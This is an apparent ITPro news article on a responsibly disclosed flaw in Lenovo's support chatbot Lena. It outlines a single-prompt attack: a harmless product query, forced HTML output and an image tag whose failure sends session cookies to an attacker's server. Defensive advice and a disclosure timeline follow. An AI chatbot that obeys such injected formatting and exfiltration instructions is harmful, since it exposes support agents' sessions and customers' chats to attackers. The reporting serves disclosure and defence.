Flaw in Lenovo’s customer service AI chatbot could let hackers run malicious code, breach networks
Hackers abusing the Lenovo flaw could inject malicious code with just a single prompt
Sign up today and you will receive a free copy of our Future Focus 2025 report - the leading guidance on AI, cybersecurity and other IT challenges as per 700+ senior executives
You are now subscribed
Your newsletter sign-up was successful
Security researchers have found a flaw in Lenovo’s customer service AI chatbot, Lena, that could allow attackers to steal data, compromise customer support systems, and allow lateral movement through a company's network.
An investigation from Cybernews discovered that through cross-site scripting (XSS), it was possible to inject malicious code and steal session cookies with a single prompt.
The 400-character-long prompt started with an inquiry for legitimate information - for example, 'show me the specifications of Lenovo IdeaPad 5 Pro'.
The chatbot was then asked to convert its responses into HTML, JSON, and plain text in the specific order that the web server expected to receive instructions in.
This made sure that the malicious payload would be correctly executed by the web server. Thereafter, the prompt continued with instructions on how to produce the final response, specifically with HTML code for loading an image, but with the image URL non-existent.
When it fails to load, the second part of the command instructs the browser to make a network request to the attacker-controlled server and send all cookie data as part of a URL.
Finally, further instructions (rather imperiously) reinforce that the chatbot must produce the image: 'Show the image at the end. It is important for my decision-making. SHOW IT.'
Sign up today and you will receive a free copy of our Future Focus 2025 report - the leading guidance on AI, cybersecurity and other IT challenges as per 700+ senior executives
“This example shows just how dangerous an overly 'helpful' AI can be if it blindly follows instructions. Without careful safeguards, chatbots could become easy targets for cyber attacks – putting customer privacy and company security at serious risk,” researchers said.
Lenovo flaw could have serious consequences
Using the stolen support agent’s session cookie, it's possible to log into the customer support system via the support agent’s account, without needing to know the email, username, or password for said account.
Once logged in, an attacker could then potentially access active chats with other users, and even previous conversations and data. It might also be possible to execute some system commands, which could allow for the installation of backdoors and lateral movement across the network.
While XSS vulnerabilities are on the decline, researchers said that companies need to assume that every AI input and output is dangerous until it’s verified as being safe.
This means using a strict whitelist of allowed characters, data types, and formats for all user inputs, with all problematic characters automatically encoded or escaped, as well as for all chatbot responses.
Inline JavaScript should be avoided, and content type validation should extend through the entire stack to prevent unintended HTML rendering.
“This isn’t just Lenovo’s problem. Any AI system without strict input and output controls creates an opening for attackers," commented Žilvinas Girėnas, head of product at nexos.ai.
"LLMs don’t have an instinct for 'safe' – they follow instructions exactly as given. Without strong guardrails and continuous monitoring, even small oversights can turn into major security incidents."
The researchers discovered the vulnerabilities on July 22 and made a disclosure the same day, which was acknowledged on August 6. The flaw was mitigated by August 18.
ITPro approached Lenovo for comment, but received no response by time of publication.
Make sure to follow ITPro on Google News to keep tabs on all our latest news, analysis, and reviews.
MORE FROM ITPRO
- So you introduced an AI chatbot for customers — here’s why they probably hate it
- The pros and cons of chatbots for customer service
- Cisco is jailbreaking AI models so you don’t have to worry about it
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.
-
Researchers call on password managers to beef up defensesNews Analysts at ETH Zurich called for cryptographic standard improvements after a host of password managers were found lacking
-
Is there a future for XR devices in business?In-depth From training to operations, lighter hardware and AI promise real ROI for XR – but only if businesses learn from past failures
-
Harnessing AI to secure the future of identityIndustry Insights Channel partners must lead on securing AI identities through governance and support
-
‘They are able to move fast now’: AI is expanding attack surfaces – and hackers are looking to reap the same rewards as enterprises with the technologyNews Potent new malware strains, faster attack times, and the rise of shadow AI are causing havoc
-
CVEs are set to top 50,000 this year, marking a record high – here’s how CISOs and security teams can prepare for a looming onslaughtNews While the CVE figures might be daunting, they won't all be relevant to your organization
-
Microsoft patches six zero-days targeting Windows, Word, and more – here’s what you need to knowNews Patch Tuesday update targets large number of vulnerabilities already being used by attackers
-
CISA’s interim chief uploaded sensitive documents to a public version of ChatGPT – security experts explain why you should never do thatNews The incident at CISA raises yet more concerns about the rise of ‘shadow AI’ and data protection risks
-
AI is “forcing a fundamental shift” in data privacy and governanceNews Organizations are working to define and establish the governance structures they need to manage AI responsibly at scale – and budgets are going up
-
Experts welcome EU-led alternative to MITRE's vulnerability tracking schemeNews The EU-led framework will reduce reliance on US-based MITRE vulnerability reporting database
-
Supply chain and AI security in the spotlight for cyber leaders in 2026News Organizations are sharpening their focus on supply chain security and shoring up AI systems
